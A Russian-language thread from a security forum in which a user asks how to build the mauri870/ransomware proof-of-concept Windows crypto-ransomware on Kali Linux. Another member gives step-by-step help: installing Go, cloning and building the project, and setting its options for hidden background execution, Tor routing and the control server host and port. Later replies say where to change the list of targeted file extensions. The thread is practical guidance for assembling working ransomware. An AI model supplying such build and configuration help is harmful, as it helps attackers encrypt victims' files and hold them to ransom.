• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

как поставить на кали - A POC Windows crypto-ransomware

code1s

New member
01.03.2020
4
0
BIT
0
как поставить на кали 2019 1a - A POC Windows crypto-ransomware ( mauri870/ransomware ) , выдает ошибку -127
Если кто сталкивался с установкой , поделитесь мыслями ......
 

f22

Codeby Academy
Gold Team
05.05.2019
1 844
225
BIT
1 124
как поставить на кали 2019 1a - A POC Windows crypto-ransomware ( mauri870/ransomware ) , выдает ошибку -127
Если кто сталкивался с установкой , поделитесь мыслями ......
Возможно, проблема со старой версией go
Удаляешь её
apt purge golang
Скачиваешь 1.14
wget https://dl.google.com/go/go1.14.linux-amd64.tar.gz
Распаковываешь
sudo tar -C /usr/local -xvzf go1.14.linux-amd64.tar.gz
Добавляешь переменные
export PATH=$PATH:/usr/local/go/bin
export GOROOT=$HOME/go
export PATH=$PATH:$GOROOT/bin
Проверяешь версию
go version


Ну а дальше всё по инструкции с git'a
git clone github.com/mauri870/ransomware
cd ransomware
make deps
И уже создаёшь с нужными параметрами
Config Parameters
You can change some of the configs during compilation. Instead of run only make, you can use the following variables:

HIDDEN='-H windowsgui' # optional. If present the malware will run in background

USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server

SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware

SERVER_PORT=8080 # the server port, if using a domain you can set this to 80

GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
Example:

make -e USE_TOR=true SERVER_HOST=mydomain.com SERVER_PORT=80 GOOS=darwin

The SERVER_ variables above only apply to the malware. The server has a flag --port that you can use to change the port that it will listen on.
 

code1s

New member
01.03.2020
4
0
BIT
0
Возможно, проблема со старой версией go
Удаляешь её
apt purge golang
Скачиваешь 1.14
wget https://dl.google.com/go/go1.14.linux-amd64.tar.gz
Распаковываешь
sudo tar -C /usr/local -xvzf go1.14.linux-amd64.tar.gz
Добавляешь переменные
export PATH=$PATH:/usr/local/go/bin
export GOROOT=$HOME/go
export PATH=$PATH:$GOROOT/bin
Проверяешь версию
go version


Ну а дальше всё по инструкции с git'a
git clone github.com/mauri870/ransomware
cd ransomware
make deps
И уже создаёшь с нужными параметрами


----------------------------------------------------------------------------------------------------------


Громадное спасибо ! ......

Да ,действительно я накрутил с GO( Goland)/ ........ после вашего разъяснения все встало , на свое место .... Тут такая суть , у меня установлена ось - kali-linux-2020-1a-installer-i386-iso ... поэтому и пакет скачал (я полагаю на этом ресурсе выкладывать нельзя и не имеет смысла ) - go1.14.lunix-386.tar.gz .. Спасибо ! Поставил палец вверх .

PS / Почувствовал себя как в пустыне с этой ошибкой , куда идти ., кого спросить .., но все так плохо , когда есть такие отзывчивые участники форума .
Как напоминалочка еще статья - Установка Golang и Bettercap в Linux
 

code1s

New member
01.03.2020
4
0
BIT
0
так ..... что-то пошло не так с - ./ build-docker.sh
В статье автора идет ссылка - Ngnok

было бы не плохо , если кто нибудь взялся на написание статьи (в развернутом виде ) по установке на kali - Ransomware.

пока сам копаю в данном направлении
 

code1s

New member
01.03.2020
4
0
BIT
0
интересно , шифрование происходит выборочно ., а не по маске .* ..., в том числе исполнительных файлов ...... м.м..мм и как дополнить (поменять ) спектр расширений файлов ?
 

f22

Codeby Academy
Gold Team
05.05.2019
1 844
225
BIT
1 124
интересно , шифрование происходит выборочно?
Думаю, что это сделано умышленно, чтобы система смогла прогрузиться хотя бы в каком-то виде.
Если шифровать вообще всё, то загрузка будет остановлена на начальных этапах.


мм и как дополнить (поменять ) спектр расширений файлов ?
Расширения лежат в файле
cmd/common.go

так ..... что-то пошло не так с - ./ build-docker.sh
В статье автора идет ссылка - Ngnok
что не так?
Между слешом и буквой b не должно быть пробела. Может в этом проблема?
Да и команда должна выглядеть вот так
./build-docker.sh make
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!